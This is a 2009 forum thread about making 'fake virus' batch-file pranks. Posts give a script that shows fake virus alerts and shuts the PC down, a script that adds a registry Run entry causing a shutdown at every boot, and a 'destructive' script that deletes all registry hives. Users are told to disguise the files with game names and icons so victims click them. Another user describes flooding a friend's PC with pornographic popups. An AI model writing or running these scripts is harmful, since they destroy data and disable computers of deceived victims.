| | How to make a fake virus with CMD | |
|
|
| Author | Message |
|---|
iHeartless Junior


Posts: 89 Join date: 2009-02-15
 | Subject: How to make a fake virus with CMD Fri Mar 06, 2009 12:09 am | |
| kk i dont this alot of times soo this isnt a real one just dont freak out lol
Heres a full set of commands i made
@echo off echo Virus Detected pause echo Scanning System pause echo Virus Software not found pause echo Downloading Software pause FTYPE FTYPE FTYPE echo Deleting Virus Stand By pause echo System Shut down pause shutdown -s or shutdown -r(for restart)
All that really does is Shut down the computer
Now make ur own Scary virus Notes: Pause: Press Any Button to Continue echo means it will say what u put infront of "echo" and FTYPE Just Makes Random Works i think and to shutdown ur computer it is shutdown -s restart is shutdown -r Ok here we go
Open Note Pad or WordPad Type @echo off echo (words go here) pause echo (words go here) pause echo (words go here) pause echo (words go here) pause FTYPE FTYPE FTYPE echo (words go here) pause echo (words go here) pause shutdown -s
and click save as (name).bat remeber the .BAT or it wont work and run it test it out go ahead and to make it longer just right click edit and SAVE not SAVE AS
But if u are lazy just like me download it =D
http://www.mediafire.com/?ivu0ydzj2tm |
|
 | |
Cryptic RoadsideMS GameMaster


Posts: 134 Join date: 2009-02-06 Age: 21
 | Subject: Re: How to make a fake virus with CMD Fri Mar 06, 2009 1:04 am | |
| Filetype alone just shows the file types used in your comp file extensions :3 Definitely not random stuff  Much more could be done to that anw :X _________________ Cryptic!
|
|
 | |
iHeartless Junior


Posts: 89 Join date: 2009-02-15
 | |
 | |
Vivi<3 Forum Mod<3


Posts: 1037 Join date: 2009-02-06 Location: The One and Only Malaysian.
 | Subject: Re: How to make a fake virus with CMD Fri Mar 06, 2009 5:39 pm | |
| |
|
 | |
Cryptic RoadsideMS GameMaster


Posts: 134 Join date: 2009-02-06 Age: 21
 | Subject: Re: How to make a fake virus with CMD Sat Mar 07, 2009 2:26 am | |
| NOTE: TRY AT YOUR OWN RISK. Copy into notepad and save as a .bat file Create a short cut for it and give it a icon and name which actually makes people click on it. A game name or whatever. Should work fine for windows xp . Prank for any unsuspecting computer idiots. Easily removed if your know how to. Haven tried it out yet, might not work :3 | Spoiler: | | | @echo off echo WORDSHERE reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v startup /t reg_sz /d shutdown -s shutdown -s
echo WORDSHERE is optional.
|
Or a destructive one Obvious enough that i didn't even spare a though to try it -_-" ..
NOTE: I don't recommend trying this out for obvious reasons..
| Spoiler: | | | @echo off echo WORDSHERE reg delete hkey_classes_root reg delete hkey_current_user reg delete hkey_local_machine reg delete hkey_users reg delete hkey_current_config shutdown -s
Extra: reg delete my computer <- if it does work, it will deleted all registry entries
echo WORDSHERE is optional.
|
_________________ Cryptic!
|
|
 | |
Kenny Senior


Posts: 129 Join date: 2009-03-06 Location: C:\Phail
 | Subject: Re: How to make a fake virus with CMD Sat Mar 07, 2009 3:16 am | |
|  ladida~ theres a program to compile bat's to exe.... and to use icon archive to put in an icon for the exe =] i spammed my friend's computer with gay porn.... hmmm.... twas fun =] but he made me remove it at the end  |
|
 | |
Vivi<3 Forum Mod<3


Posts: 1037 Join date: 2009-02-06 Location: The One and Only Malaysian.
 | Subject: Re: How to make a fake virus with CMD Sat Mar 07, 2009 9:15 am | |
| |
|
 | |
iHeartless Junior


Posts: 89 Join date: 2009-02-15
 | Subject: Re: How to make a fake virus with CMD Sat Mar 07, 2009 9:59 am | |
| | Vivi<3 wrote: | | ouch gay porn. |
Huh? |
|
 | |
Vivi<3 Forum Mod<3


Posts: 1037 Join date: 2009-02-06 Location: The One and Only Malaysian.
 | Subject: Re: How to make a fake virus with CMD Sat Mar 07, 2009 10:43 am | |
| he spammed gay porn to his friend, that must have scared the shit out of him lol. |
|
 | |
Cryptic RoadsideMS GameMaster


Posts: 134 Join date: 2009-02-06 Age: 21
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 12:17 am | |
| easily removed in safemode or in command prompt :3 _________________ Cryptic!
|
|
 | |
Sanjay Member

Posts: 19 Join date: 2009-02-23 Age: 21
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 2:20 pm | |
| Err, you guys must be really bored or have no life to create a fake virus. |
|
 | |
Vivi<3 Forum Mod<3


Posts: 1037 Join date: 2009-02-06 Location: The One and Only Malaysian.
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 2:22 pm | |
| |
|
 | |
Kenny Senior


Posts: 129 Join date: 2009-03-06 Location: C:\Phail
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 2:34 pm | |
| | Vivi<3 wrote: | | Boredness/Loneliness. |
you forgot Self-amusement |
|
 | |
Vivi<3 Forum Mod<3


Posts: 1037 Join date: 2009-02-06 Location: The One and Only Malaysian.
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 2:39 pm | |
| =\ gay porn is not funny. |
|
 | |
Kenny Senior


Posts: 129 Join date: 2009-03-06 Location: C:\Phail
 | Subject: Re: How to make a fake virus with CMD Sun Mar 08, 2009 2:42 pm | |
| no, but watching your friends reaction when opening a "game" and watching his computer restart with tons of gay porn popups....... IS  |
|
 | |
| | How to make a fake virus with CMD | |
|